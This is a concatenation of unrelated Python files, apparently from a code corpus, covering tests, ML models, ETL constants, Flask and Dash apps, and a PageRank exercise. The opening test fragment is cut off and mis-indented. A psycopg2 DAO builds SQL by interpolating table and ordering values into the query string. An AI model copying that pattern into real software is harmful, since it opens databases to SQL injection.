    interfaces = self.system.get_ip_interface_list(
        director_id=self.data.director_id2, port_id=0)
    self.assertIsInstance(interfaces, list)
    self.assertTrue(interfaces)
    self.assertEqual(self.data.ip_interface_list.get('ipInterfaceId'),
                     interfaces)
def test_get_ip_interface(self):
    """Test get_ip_interface returns full interface details."""
    details = self.system.get_ip_interface(
        director_id=self.data.director_id2, port_id=0,
        interface_id=self.data.ip_interface_address_network)
    self.assertIsInstance(details, dict)
    self.assertTrue(details)
    self.assertEqual(self.data.ip_interface_details, details)
@mock.patch.object(common.CommonFunctions, 'modify_resource')
def test_change_local_user_password(self, mck_modify):
    """Test change_local_user_password issues a SetPassword action."""
    self.system.change_local_user_password(
        username='testchange', current_password='oldpass',
        new_password='newpassword')
    # Expected payload for the local user SetPassword endpoint.
    payload = {
        'username': 'testchange',
        'action': "SetPassword",
        'set_password': {
            'current_password': 'oldpass',
            'new_password': 'newpassword'
        }
    }
    mck_modify.assert_called_once_with(
        category=SYSTEM, resource_level=LOCAL_USER, payload=payload)
| 25,735 | 7,940 |
"""Create foreground/background motion masks from detections."""
import argparse
import logging
import pickle
import pprint
from pathlib import Path
import numpy as np
from PIL import Image
import pycocotools.mask as mask_util
from utils.fbms import utils as fbms_utils
from utils.log import add_time_to_path, setup_logging
def create_masks_sequence(groundtruth_dir, predictions_dir, output_dir,
                          threshold):
    """Write a binary motion mask PNG for each labelled frame of a sequence.

    Args:
        groundtruth_dir (Path): Sequence directory containing 'GroundTruth'.
        predictions_dir (Path): Directory with per-frame detection pickles.
        output_dir (Path): Where '<frame>.png' masks are written.
        threshold (float): Detections scoring <= threshold are ignored.
    """
    groundtruth = fbms_utils.FbmsGroundtruth(groundtruth_dir / 'GroundTruth')
    mask_shape = None
    for frame_number, frame_path in groundtruth.frame_label_paths.items():
        filename = frame_path.stem
        filename = filename.replace('_gt', '')
        pickle_file = predictions_dir / (filename + '.pickle')
        output_path = output_dir / (filename + '.png')
        if output_path.exists():
            # Already processed; allows resuming interrupted runs.
            continue
        if not pickle_file.exists():
            # Fix: logging.warn is deprecated (and removed in Python 3.13);
            # logging.warning is the supported spelling.
            logging.warning(
                "Couldn't find detections for "
                f"{pickle_file.relative_to(predictions_dir.parent)}")
            continue
        if mask_shape is None:
            # PIL reports (width, height); numpy masks use (height, width).
            image_size = Image.open(frame_path).size
            mask_shape = (image_size[1], image_size[0])
        with open(pickle_file, 'rb') as f:
            frame_data = pickle.load(f)
        if frame_data['segmentations'] is None:
            frame_data['segmentations'] = [
                [] for _ in range(len(frame_data['boxes']))
            ]
        segmentations = []
        scores = []
        # Merge all classes into one foreground set (index 0 is skipped).
        for c in range(1, len(frame_data['segmentations'])):
            scores.extend(frame_data['boxes'][c][:, 4])
            segmentations.extend(frame_data['segmentations'][c])
        final_mask = np.zeros(mask_shape, dtype=np.uint8)
        for score, segmentation in zip(scores, segmentations):
            if score <= threshold:
                continue
            mask = mask_util.decode(segmentation)
            final_mask[mask == 1] = 255
        Image.fromarray(final_mask).save(output_path)
def create_masks_split(groundtruth_dir, predictions_dir, output_dir,
                       threshold):
    """Create masks for every sequence directory in one FBMS split.

    Args:
        groundtruth_dir (Path)
        predictions_dir (Path)
        output_dir (Path)
    """
    sequence_dirs = (d for d in groundtruth_dir.iterdir() if d.is_dir())
    for sequence_groundtruth in sequence_dirs:
        sequence_predictions = predictions_dir / sequence_groundtruth.name
        sequence_output = output_dir / sequence_groundtruth.name
        assert sequence_predictions.exists(), (
            f"Couldn't find sequence predictions at {sequence_predictions}")
        sequence_output.mkdir(exist_ok=True, parents=True)
        create_masks_sequence(sequence_groundtruth, sequence_predictions,
                              sequence_output, threshold)
def main():
    """Parse CLI arguments and create masks for whichever splits exist."""
    # Use first line of file docstring as description if it exists.
    parser = argparse.ArgumentParser(
        description=__doc__.split('\n')[0] if __doc__ else '',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('--detections-root', type=Path, required=True)
    parser.add_argument('--fbms-root', type=Path, required=True)
    parser.add_argument('--output-dir', type=Path, required=True)
    parser.add_argument('--threshold', type=float, default=0.7)
    args = parser.parse_args()
    fbms_root = args.fbms_root
    detections_root = args.detections_root
    output_dir = args.output_dir
    # assert not output_dir.exists()
    assert detections_root.exists()
    assert fbms_root.exists()
    output_dir.mkdir(exist_ok=True, parents=True)
    # Log to a timestamped file inside the output directory.
    setup_logging(
        add_time_to_path(output_dir / (Path(__file__).name + '.log')))
    logging.info('Args: %s\n', pprint.pformat(vars(args)))
    # Process the training split if present under --fbms-root.
    train_split = 'TrainingSet'
    train_fbms = fbms_root / train_split
    if train_fbms.exists():
        train_detections = detections_root / train_split
        train_output = output_dir / train_split
        assert train_detections.exists(), (
            f'No detections found for TrainingSet at {train_detections}')
        create_masks_split(train_fbms, train_detections, train_output,
                           args.threshold)
    # Process the test split if present.
    test_split = 'TestSet'
    test_fbms = fbms_root / test_split
    if test_fbms.exists():
        test_detections = detections_root / test_split
        test_output = output_dir / test_split
        assert test_detections.exists(), (
            f'No detections found for TestSet at {test_detections}')
        create_masks_split(test_fbms, test_detections, test_output,
                           args.threshold)
    if not (train_fbms.exists() or test_fbms.exists()):
        # Assume that --fbms-root and --detections-root refer to a specific
        # split.
        create_masks_split(fbms_root, detections_root, output_dir,
                           args.threshold)
# Script entry point.
if __name__ == "__main__":
    main()
| 4,968 | 1,500 |
"""
Strip me
"""
# NOTE(review): fixture for docstring-stripping tests -- the "Strip me"
# docstrings are the test payload; do not reword or remove them.
class EmptyClass(object):
    """Strip me"""
    pass

    def empty_method(self):
        """Strip me"""
        pass
# NOTE(review): fixture routine -- the docstring below is intentional
# test input for a docstring stripper; leave it byte-for-byte intact.
def empty_routine():
    """
    Strip me
    :return: nothing
    """
    pass
| 221 | 82 |
import json
import socket
import tempfile
from google.oauth2 import service_account
import googleapiclient.discovery
from .config import (
GOOGLE_SERVICE_ACCOUNT_CLIENT_EMAIL,
GOOGLE_SERVICE_ACCOUNT_CLIENT_ID,
GOOGLE_SERVICE_ACCOUNT_DELAGATED_ACCOUNT,
GOOGLE_SERVICE_ACCOUNT_PRIVATE_KEY,
GOOGLE_SERVICE_ACCOUNT_PRIVATE_KEY_ID,
GOOGLE_SERVICE_ACCOUNT_PROJECT_ID,
GOOGLE_DEVELOPER_KEY,
)
# Default timeout (seconds) applied to all new sockets, so API calls
# cannot hang indefinitely.
TIMEOUT = 300
socket.setdefaulttimeout(TIMEOUT)
def get_service(service_name: str, version: str, scopes: list):
    """Build a delegated Google API client for the configured service account.

    Args:
        service_name: Google API service identifier (e.g. 'admin').
        version: API version string for that service.
        scopes: OAuth scopes to request for the credentials.

    Returns:
        A googleapiclient service resource authorized as the delegated
        account.
    """
    data = {
        "type": "service_account",
        "project_id": GOOGLE_SERVICE_ACCOUNT_PROJECT_ID,
        "private_key_id": GOOGLE_SERVICE_ACCOUNT_PRIVATE_KEY_ID,
        # The key is stored with escaped newlines; restore real newlines.
        "private_key": str(GOOGLE_SERVICE_ACCOUNT_PRIVATE_KEY).replace("\\n", "\n"),
        "client_email": GOOGLE_SERVICE_ACCOUNT_CLIENT_EMAIL,
        "client_id": GOOGLE_SERVICE_ACCOUNT_CLIENT_ID,
        "token_uri": "https://oauth2.googleapis.com/token",
    }
    # Build credentials directly from the mapping instead of round-tripping
    # through a temporary file: avoids writing the private key to disk and
    # sidesteps NamedTemporaryFile's re-open limitation on Windows.
    credentials = service_account.Credentials.from_service_account_info(
        data, scopes=scopes
    )
    delegated_credentials = credentials.with_subject(
        GOOGLE_SERVICE_ACCOUNT_DELAGATED_ACCOUNT
    )
    return googleapiclient.discovery.build(
        service_name,
        version,
        credentials=delegated_credentials,
        cache_discovery=False,
        developerKey=GOOGLE_DEVELOPER_KEY,
    )
| 1,669 | 586 |
from flask import Flask, render_template, request
from web_app.fhir_client import fetch_patient_data
# Flask application instance used by the route decorators below.
app = Flask(__name__)


@app.route('/')
def root():
    """Render the landing page."""
    return render_template('root.html')
@app.route('/patient/')
def view_patient():
    """Render the detail page for the patient given by ?patient_id=..."""
    patient_id = request.args['patient_id']
    patient, observations, diag_reports = fetch_patient_data(patient_id)
    context = {
        'patient': patient,
        'observations': observations,
        'diag_reports': diag_reports,
    }
    return render_template("patient.html", **context)
| 511 | 168 |
import psycopg2
class Dao:
    """Context-managed data-access object over a PostgreSQL database.

    Usage::

        with Dao(db_url) as dao:
            rows = dao.get("vectors")
    """

    def __init__(self, dbUrl):
        self._url = dbUrl

    def __enter__(self):
        conn = psycopg2.connect(self._url)
        self.conn = conn

        class _Dao:
            # Inner helper bound to ``conn`` via closure; this is the object
            # handed to the ``with`` block.

            def get(self, table, orderBy="id", limit=None):
                # NOTE(review): table/orderBy/limit are interpolated directly
                # into the SQL text -- safe only for trusted identifiers.
                # Never pass user-controlled values here.
                cursor = conn.cursor()
                sql = "SELECT * FROM %s ORDER BY %s" % (table, orderBy)
                if limit:
                    sql += " LIMIT %i" % limit
                cursor.execute(sql)
                return cursor.fetchall()

            def put(self, table, data):
                # Replaces the full contents of ``table``; ``data`` is
                # iterated as (id, vector) pairs.
                cursor = conn.cursor()
                cursor.execute("DELETE FROM %s" % table)
                for i, vec in data:
                    sql = "INSERT INTO %s VALUES (%%s, %%s)" % table
                    # Postgres array literal, e.g. '{1.0,2.0}'.
                    arr = "{" + ','.join([str(x) for x in vec]) + "}"
                    cursor.execute(sql, (i, arr))
                conn.commit()
                return True

        return _Dao()

    def __exit__(self, type, value, traceback):
        self.conn.close()
#!/usr/bin/env python3
from . import align, cc2d, tools
| 57 | 22 |
from django.db import models
from django.utils.translation import ugettext_lazy as _
class HomeTab(models.Model):
    """A named, orderable tab shown on the home page."""

    # Display name of the tab.
    name = models.CharField(_('home_tab_name'), max_length=100)
    # Ordering value among tabs.
    order = models.PositiveSmallIntegerField(_('home_tab_order'))

    class Meta:
        verbose_name = _('home_tab')
        verbose_name_plural = _('home_tabs')

    def __str__(self):
        return self.name
| 394 | 127 |
import tensorflow as tf
class SoftmaxClassifier(object):
    """Softmax (multinomial logistic regression) head over encoded features.

    Builds, in TF1 graph mode, a linear layer + softmax together with
    accuracy, cross-entropy loss and an Adam training op.
    """

    # x should have a shape of [batch size, encoded feature size]
    def __init__(self, x: tf.Tensor, n_categories: int, scope: str):
        with tf.name_scope(scope):
            self.labels: tf.Tensor = tf.placeholder(tf.int64, [None], name='labels')  # shape: [batch size]
            # one-hot encode the class label
            y = tf.cast(tf.one_hot(self.labels, n_categories), tf.float32)
            enc_feature_size = int(x.shape[1])
            # Set model weights (zero-initialized).
            self.weights: tf.Tensor = tf.Variable(tf.zeros([enc_feature_size, n_categories]), name='weights')
            self.biases: tf.Tensor = tf.Variable(tf.zeros([n_categories]), name='biases')
            # NOTE(review): despite the name, these are softmax probabilities,
            # not raw logits.
            self.logits: tf.Tensor = tf.nn.softmax(tf.matmul(x, self.weights) + self.biases, axis=1, name='logits')
            correct_prediction = tf.equal(tf.argmax(self.logits, 1), tf.argmax(y, 1))
            self.accuracy: tf.Tensor = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
            # Some elements of the logits easily collapse to zero at the beginning, so add a bit of an epsilon to avoid
            # -inf logs
            # TODO(damian): perhaps we can achieve decent results by initializing the weights intelligently
            # instead of resorting to this
            self.loss: tf.Tensor = tf.reduce_mean(-tf.reduce_sum(y * tf.log(self.logits + 1e-10), axis=1))
            self.optimizer: tf.Operation = tf.train.AdamOptimizer().minimize(self.loss)
| 1,528 | 489 |
# https://stepik.org/lesson/265081/step/12?discussion=1542627&thread=solutions&unit=246029
# Read three integers and print the sum of the strictly positive ones.
a, b, c = int(input()), int(input()), int(input())
s = sum(v for v in (a, b, c) if v > 0)
print(s)
| 226 | 113 |
# Tuned version components; TUNED_VERSION_STR is the "major.minor.patch"
# string form assembled from them.
TUNED_VERSION_MAJOR = 2
TUNED_VERSION_MINOR = 18
TUNED_VERSION_PATCH = 0
TUNED_VERSION_STR = ".".join(
    str(part) for part in (TUNED_VERSION_MAJOR, TUNED_VERSION_MINOR,
                           TUNED_VERSION_PATCH))
| 171 | 88 |
'''
blog space for
collaborative and
model development process
RJProcess
'''
# Imports from 3rd party libraries
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from app import app
# 1 column layout
# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
# Left column: markdown write-up of the team's modelling methodology.
column1 = dbc.Col(
    [
        dcc.Markdown(
            """
        
            ## Methodology of the Team:
            #
            Initial exploration of our AirBnB dataset revealed 74,111 observations, with 28 features, and a target variable, log_price.
            The first steps were to prepare the dataset to fit an exploratory linear model.
            Variables with > 5% missing data were removed.
            Variables with high cardinality or unusable variance were removed.
            Rare/ nontraditional property types were grouped together to reduce the cardinality of the property type variable.
            Log_price was exponentiated to return actual price.
            Baseline MAE was 83.3.
            Linear Regression and LassoCV models were fit using Scikit-Learn. Categorical variables were one-hot encoded, missing values were imputed using the mean method, numerical variables were standardized.
            """
        ),
    ],
)

# create footer
# Right column: static image of the target distribution.
column2 = dbc.Col(
    [
        html.Img(src='assets/log_price_distribution.png', className='img-fluid')
    ],
)

# Two-column row exported to the page registry.
layout = dbc.Row([column1, column2])
def set_access_token(document, endpoint_params, security_params,
                     authorization_required):
    """Fetch and validate an access token for the document's user.

    NOTE(review): the original fragment was not valid Python (a bare ``def``
    and a pseudocode condition); this wraps the existing body in a concrete
    function. Confirm the intended signature against the caller.

    Args:
        document: Mapping holding at least 'user_id'.
        endpoint_params: Mapping with 'token_endpoint' and
            'timeout_token_request'.
        security_params: Mapping with 'public_key' and 'identity_claim'.
        authorization_required: Whether a token must be obtained at all.

    Returns:
        The validated access token, or None when authorization is not
        required.

    Raises:
        Forbidden: If the token cannot be obtained or validated.
    """
    # Set access token
    if authorization_required:
        try:
            access_token = request_access_token(
                user_id=document['user_id'],
                token_endpoint=endpoint_params['token_endpoint'],
                timeout=endpoint_params['timeout_token_request'],
            )
            validate_token(
                token=access_token,
                key=security_params['public_key'],
                identity_claim=security_params['identity_claim'],
            )
        except Exception as e:
            logger.exception(
                (
                    'Could not get access token from token endpoint '
                    "'{token_endpoint}'. Original error message {type}: {msg}"
                ).format(
                    token_endpoint=endpoint_params['token_endpoint'],
                    type=type(e).__name__,
                    msg=e,
                )
            )
            raise Forbidden
    else:
        access_token = None
    return access_token
| 999 | 231 |
from .loss import NT_Xent
| 26 | 11 |
# Copyright (c) 2020, Kis Imre. All rights reserved.
# SPDX-License-Identifier: MIT
| 84 | 37 |
from pagerank_test import small_links, A2
from pagerank import find_word, read_data
from vec import Vec
from mat import Mat
from math import sqrt
# Task 13.12.1
def find_num_links(L):
    """Return a Vec giving, per column of ``L``, the sum of its entries.

    Computed as the all-ones row vector times ``L`` -- i.e. the number of
    links associated with each page.
    """
    return Vec(L.D[0], {key: 1 for key in L.D[0]}) * L
# Task 13.12.2
def make_Markov(L):
    """Normalize ``L`` in place so each column sums to 1 (Markov matrix).

    Every stored entry is divided by its column's link count.
    """
    num_links = find_num_links(L)
    for i in L.f:
        L[i] /= num_links[i[1]]
# Normalize the small example link matrix in place.
make_Markov(small_links)

# Task 13.12.3
def power_method(A1, k):
    """Approximate the PageRank eigenvector of ``A1`` with ``k`` power steps.

    Each step applies u = 0.85*A1*v + (0.15/n)*sum(v) and prints
    sqrt((v*v)/(u*u)) as a convergence indicator.
    """
    v = Vec(A1.D[1], {key: 1 for key in A1.D[1]})
    col_len = len(A1.D[1])
    for i in range(k):
        sub_v = 0.15 * v
        sum_v = sum(sub_v.f.values())
        # "Teleport" term: 15% of the mass spread uniformly over all pages.
        A2_vec = Vec(sub_v.D, {key: sum_v / col_len for key in sub_v.D})
        u = 0.85 * A1 * v + A2_vec
        print(sqrt((v * v) / (u * u)))
        v = u
    return v
# Task 13.12.4
# Load the full link matrix from disk.
links = read_data("links.bin")
# Task 13.12.5
def wikigoogle(w, k, p):
    """Return the top-``k`` pages mentioning word ``w``, ranked by ``p``."""
    related = find_word(w)
    return sorted(related, key=lambda x: p[x], reverse=True)[:k]
# Task 13.12.6
# Normalize the full link matrix and run two power-method iterations.
make_Markov(links)
eigenvec = power_method(links, 2)
jordanlist = wikigoogle("jordan", 10, eigenvec)

# Task 13.12.7
def power_method_biased(A1, k, r):
    """Power method with extra rank bias toward page ``r``.

    Like power_method, but 30% of the update mass is directed at ``r``
    and only 55% follows the link structure (0.55 + 0.15 + 0.30 = 1).
    """
    v = Vec(A1.D[1], {key: 1 for key in A1.D[1]})
    col_len = len(A1.D[1])
    for i in range(k):
        sub_v = 0.15 * v
        sum_v = sum(sub_v.f.values())
        # All of v's mass, scaled by 0.3, concentrated on the bias page r.
        Ar = 0.3 * Vec(A1.D[0], {r: sum(v.f.values())})
        A2_vec = Vec(sub_v.D, {key: sum_v / col_len for key in sub_v.D})
        u = 0.55 * A1 * v + A2_vec + Ar
        print(sqrt((v * v) / (u * u)))
        v = u
    return v
# Rank "jordan" pages using the eigenvector biased toward the "sport" page,
# then print both the unbiased and biased result lists for comparison.
sport_biased_eigenvec = power_method_biased(links, 2, "sport")
sport_biased_jordanlist = wikigoogle("jordan", 10, sport_biased_eigenvec)
print(jordanlist)
print(sport_biased_jordanlist)

# Task 13.12.8
def wikigoogle2(words, k, p):
    """Return the top-``k`` pages containing ALL of ``words``, ranked by ``p``.

    Fix: the running intersection is a ``set``, which has no ``sort``
    method -- calling ``related.sort(...)`` raised AttributeError. Use
    ``sorted`` to produce the ordered list instead.
    """
    wordlist = [set(find_word(x)) for x in words]
    related = wordlist[0]
    for i in range(1, len(wordlist)):
        related = related.intersection(wordlist[i])
    return sorted(related, key=lambda x: p[x], reverse=True)[:k]
# Fix: each query word must be its own list element -- "jordan, tiger" was
# a single string that could never match a word index entry.
print(wikigoogle2(["jordan", "tiger"], 10, sport_biased_eigenvec))
| 2,085 | 957 |
import tensorflow as tf
from tensorflow.contrib import layers
from tensorflow.contrib.cudnn_rnn import CudnnLSTM
from tensorflow.contrib.cudnn_rnn.python.layers.cudnn_rnn import CUDNN_RNN_BIDIRECTION
import os
from tasks.acp.data import RealData
class Parser:
    """Interface for sub-parsers that turn encoded inputs into output logits."""

    def parse(self, x, context, is_training):
        """Produce output logits for ``x`` given the document context."""
        raise NotImplementedError()

    def restore(self):
        """
        Must return a tuple of (scope, restore_file_path).
        """
        raise NotImplementedError()
class NoOpParser(Parser):
    """Pass-through parser: returns its input unchanged, nothing to restore."""

    def parse(self, x, context, is_training):
        return x

    def restore(self):
        return None
class OptionalParser(Parser):
    """Wraps a parser so the model can also emit an "empty" (all-EOS) answer.

    A learned scalar gate derived from the context adds logit mass to a
    constant EOS sequence, letting the model abstain from parsing.
    """

    def __init__(self, delegate: Parser, bs, seq_out, n_out, eos_idx):
        self.eos_idx = eos_idx
        self.n_out = n_out
        self.seq_out = seq_out
        self.bs = bs
        self.delegate = delegate

    def restore(self):
        return self.delegate.restore()

    def parse(self, x, context, is_training):
        parsed = self.delegate.parse(x, context, is_training)
        # Constant all-EOS target, one-hot encoded.
        empty_answer = tf.constant(self.eos_idx, tf.int32, shape=(self.bs, self.seq_out))
        empty_answer = tf.one_hot(empty_answer, self.n_out)  # (bs, seq_out, n_out)
        # Per-example scalar deciding how strongly to prefer the empty answer.
        logit_empty = layers.fully_connected(context, 1, activation_fn=None)  # (bs, 1)
        return parsed + tf.reshape(logit_empty, (self.bs, 1, 1)) * empty_answer
class AmountParser(Parser):
    """
    You should pre-train this parser to parse amounts otherwise it's hard to learn jointly.
    """
    seq_in = RealData.seq_in
    seq_out = RealData.seq_amount
    n_out = len(RealData.chars)

    scope = 'parse/amounts'

    def __init__(self, bs):
        os.makedirs("./snapshots/amounts", exist_ok=True)
        self.bs = bs

    def restore(self):
        return self.scope, "./snapshots/amounts/best"

    def parse(self, x, context, is_training):
        """Pointer-generator style decoder over the input characters."""
        with tf.variable_scope(self.scope):
            # Input RNN (bidirectional, so hidden size doubles to 256).
            in_rnn = CudnnLSTM(1, 128, direction=CUDNN_RNN_BIDIRECTION, name="in_rnn")
            h_in, _ = in_rnn(tf.transpose(x, [1, 0, 2]))
            h_in = tf.reshape(tf.transpose(h_in, [1, 0, 2]), (self.bs, self.seq_in, 1, 256))  # (bs, seq_in, 1, 256)
            # Output RNN, driven by zeros.
            out_input = tf.zeros((self.seq_out, self.bs, 1))  # consider teacher forcing.
            out_rnn = CudnnLSTM(1, 128, name="out_rnn")
            h_out, _ = out_rnn(out_input)
            h_out = tf.reshape(tf.transpose(h_out, [1, 0, 2]), (self.bs, 1, self.seq_out, 128))  # (bs, 1, seq_out, 128)
            # Bahdanau (additive) attention over the input positions.
            att = tf.nn.tanh(layers.fully_connected(h_out, 128, activation_fn=None) + layers.fully_connected(h_in, 128, activation_fn=None))
            att = layers.fully_connected(att, 1, activation_fn=None)  # (bs, seq_in, seq_out, 1)
            att = tf.nn.softmax(att, axis=1)  # (bs, seq_in, seq_out, 1)
            attended_h = tf.reduce_sum(att * h_in, axis=1)  # (bs, seq_out, 256)
            # Gate between generating a char and copying one from the input.
            p_gen = layers.fully_connected(attended_h, 1, activation_fn=tf.nn.sigmoid)  # (bs, seq_out, 1)
            p_copy = (1 - p_gen)
            # Generate branch.
            gen = layers.fully_connected(attended_h, self.n_out, activation_fn=None)  # (bs, seq_out, n_out)
            gen = tf.reshape(gen, (self.bs, self.seq_out, self.n_out))
            # Copy branch: log of the attention-weighted input one-hots;
            # the epsilon avoids log(0).
            copy = tf.log(tf.reduce_sum(att * tf.reshape(x, (self.bs, self.seq_in, 1, self.n_out)), axis=1) + 1e-8)  # (bs, seq_out, n_out)
            output_logits = p_copy * copy + p_gen * gen
            return output_logits
class DateParser(Parser):
    """
    You should pre-train this parser to parse dates otherwise it's hard to learn jointly.
    """
    seq_out = RealData.seq_date
    n_out = len(RealData.chars)

    scope = 'parse/date'

    def __init__(self, bs):
        os.makedirs("./snapshots/dates", exist_ok=True)
        self.bs = bs

    def restore(self):
        return self.scope, "./snapshots/dates/best"

    def parse(self, x, context, is_training):
        """Convolutional encoder + MLP emitting a fixed-length date sequence."""
        with tf.variable_scope(self.scope):
            # Four conv + pool stages; each pooling halves the sequence length.
            for i in range(4):
                x = tf.layers.conv1d(x, 128, 3, padding="same", activation=tf.nn.relu)  # (bs, 128, 128)
                x = tf.layers.max_pooling1d(x, 2, 2)  # (bs, 64-32-16-8, 128)
            # Global sum pooling over the remaining positions.
            x = tf.reduce_sum(x, axis=1)  # (bs, 128)
            x = tf.concat([x, context], axis=1)  # (bs, 256)
            for i in range(3):
                x = layers.fully_connected(x, 256)
                x = layers.dropout(x, is_training=is_training)
            x = layers.fully_connected(x, self.seq_out * self.n_out, activation_fn=None)
            return tf.reshape(x, (self.bs, self.seq_out, self.n_out))
| 4,695 | 1,768 |
""" File with the definitions of constants for the ETL scripts. """
SCRIPTS_DIR = "scripts"
SCRIPTS_ETL_DIR = f"{SCRIPTS_DIR}/etl"
SCRIPTS_ETL_TRANSFORM = f"{SCRIPTS_ETL_DIR}/transform.sh"
VENV_BIN = ".venv/bin"
VENV_KAGGLE_BIN = f"{VENV_BIN}/kaggle"
DOCKER_DIR = "docker"
ENVARS_DIR = f"{DOCKER_DIR}/env.d"
DATA_DIR = f"{DOCKER_DIR}/database/data"
DATA_FILE_EXTENSION = ".csv"
KAGGLE_DATASETS = [
"olistbr/brazilian-ecommerce",
"nicapotato/womens-ecommerce-clothing-reviews",
]
# CSV/table base names of the Olist Brazilian e-commerce dataset.
OLIST_TABLE_CATEGORY_TRANSLATIONS = "product_category_name_translation"
OLIST_TABLE_GEOLOCATION = "olist_geolocation_dataset"
OLIST_TABLE_CUSTOMERS = "olist_customers_dataset"
OLIST_TABLE_ORDERS = "olist_orders_dataset"
OLIST_TABLE_PRODUCTS = "olist_products_dataset"
OLIST_TABLE_SELLERS = "olist_sellers_dataset"
OLIST_TABLE_ORDER_PAYMENTS = "olist_order_payments_dataset"
OLIST_TABLE_ORDER_REVIEWS = "olist_order_reviews_dataset"
OLIST_TABLE_ORDER_ITEMS = "olist_order_items_dataset"
# All Olist tables, in the order the transform step processes them.
OLIST_DATASET_TABLES = [
    OLIST_TABLE_CATEGORY_TRANSLATIONS,
    OLIST_TABLE_GEOLOCATION,
    OLIST_TABLE_CUSTOMERS,
    OLIST_TABLE_ORDERS,
    OLIST_TABLE_PRODUCTS,
    OLIST_TABLE_SELLERS,
    OLIST_TABLE_ORDER_PAYMENTS,
    OLIST_TABLE_ORDER_REVIEWS,
    OLIST_TABLE_ORDER_ITEMS,
]
# Per-table pandas dtype maps for the Olist CSVs.  "Int64" (capital I) is the
# pandas nullable integer dtype; plain ``str``/``float`` map to object/float64.
# Date-like columns are deliberately kept as ``str`` here.
OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP = {
    "product_category_name": str,
    "product_category_name_english": str,
}
OLIST_TABLE_CATEGORY_TRANSLATIONS_COLUMNS = (
    OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP.keys()
)
OLIST_TABLE_GEOLOCATION_TYPE_MAP = {
    "geolocation_zip_code_prefix": str,
    "geolocation_lat": float,
    "geolocation_lng": float,
    "geolocation_city": str,
    "geolocation_state": str,
}
OLIST_TABLE_GEOLOCATION_COLUMNS = OLIST_TABLE_GEOLOCATION_TYPE_MAP.keys()
OLIST_TABLE_CUSTOMERS_TYPE_MAP = {
    "customer_id": str,
    "customer_unique_id": str,
    "customer_zip_code_prefix": str,
    "customer_city": str,
    "customer_state": str,
}
OLIST_TABLE_CUSTOMERS_COLUMNS = OLIST_TABLE_CUSTOMERS_TYPE_MAP.keys()
OLIST_TABLE_ORDERS_TYPE_MAP = {
    "order_id": str,
    "customer_id": str,
    "order_status": str,
    "order_purchase_date": str,
    "order_approved_at": str,
    "order_delivered_carrier_date": str,
    "order_delivered_customer_date": str,
    "order_estimated_delivery_date": str,
}
OLIST_TABLE_ORDERS_COLUMNS = OLIST_TABLE_ORDERS_TYPE_MAP.keys()
OLIST_TABLE_PRODUCTS_TYPE_MAP = {
    "product_id": str,
    "product_category_name": str,
    # NOTE(review): "product_name_lenght" is typed ``str`` while the sibling
    # *_lenght/_qty columns are "Int64" -- confirm this asymmetry is intended.
    # (The "lenght" misspelling matches the upstream CSV headers.)
    "product_name_lenght": str,
    "product_description_lenght": "Int64",
    "product_photos_qty": "Int64",
    "product_weight_g": "Int64",
    "product_length_cm": "Int64",
    "product_height_cm": "Int64",
    "product_width_cm": "Int64",
}
OLIST_TABLE_PRODUCTS_COLUMNS = OLIST_TABLE_PRODUCTS_TYPE_MAP.keys()
OLIST_TABLE_SELLERS_TYPE_MAP = {
    "seller_id": str,
    "seller_zip_code_prefix": str,
    "seller_city": str,
    "seller_state": str,
}
OLIST_TABLE_SELLERS_COLUMNS = OLIST_TABLE_SELLERS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP = {
    "order_id": str,
    "payment_sequential": "Int64",
    "payment_type": str,
    "payment_installments": "Int64",
    "payment_value": float,
}
OLIST_TABLE_ORDER_PAYMENTS_COLUMNS = OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP = {
    "review_id": str,
    "order_id": str,
    "review_score": "Int64",
    "review_comment_title": str,
    "review_comment_message": str,
    "review_creation_date": str,
    "review_answer_date": str,
}
OLIST_TABLE_ORDER_REVIEWS_COLUMNS = OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_ITEMS_TYPE_MAP = {
    "order_id": str,
    "order_item_id": "Int64",
    "product_id": str,
    "seller_id": str,
    "shipping_limit_date": str,
    "price": float,
    "freight_value": float,
}
OLIST_TABLE_ORDER_ITEMS_COLUMNS = OLIST_TABLE_ORDER_ITEMS_TYPE_MAP.keys()
# Table name -> dtype map, for generic per-table loading code.
OLIST_DATASET_TABLES_TYPES_MAP = {
    OLIST_TABLE_CATEGORY_TRANSLATIONS: OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP,
    OLIST_TABLE_GEOLOCATION: OLIST_TABLE_GEOLOCATION_TYPE_MAP,
    OLIST_TABLE_CUSTOMERS: OLIST_TABLE_CUSTOMERS_TYPE_MAP,
    OLIST_TABLE_ORDERS: OLIST_TABLE_ORDERS_TYPE_MAP,
    OLIST_TABLE_PRODUCTS: OLIST_TABLE_PRODUCTS_TYPE_MAP,
    OLIST_TABLE_SELLERS: OLIST_TABLE_SELLERS_TYPE_MAP,
    OLIST_TABLE_ORDER_PAYMENTS: OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP,
    OLIST_TABLE_ORDER_REVIEWS: OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP,
    OLIST_TABLE_ORDER_ITEMS: OLIST_TABLE_ORDER_ITEMS_TYPE_MAP,
}
# Table name -> columns that may legitimately contain nulls.
OLIST_DATASET_TABLES_NULLABLE_COLUMNS = {
    OLIST_TABLE_CATEGORY_TRANSLATIONS: [],
    OLIST_TABLE_GEOLOCATION: [],
    OLIST_TABLE_CUSTOMERS: [],
    OLIST_TABLE_ORDERS: [],
    OLIST_TABLE_PRODUCTS: [],
    OLIST_TABLE_SELLERS: [],
    OLIST_TABLE_ORDER_PAYMENTS: [],
    OLIST_TABLE_ORDER_REVIEWS: ["review_comment_title", "review_comment_message"],
    OLIST_TABLE_ORDER_ITEMS: [],
}
# Women's E-Commerce Clothing Reviews (WECR) dataset constants.
WECR_DATASET_TABLE = "Womens_Clothing_E-Commerce_Reviews"
# Raw CSV column headers as they appear in the Kaggle file.
WECR_COLUMN_ID = "Unnamed: 0"
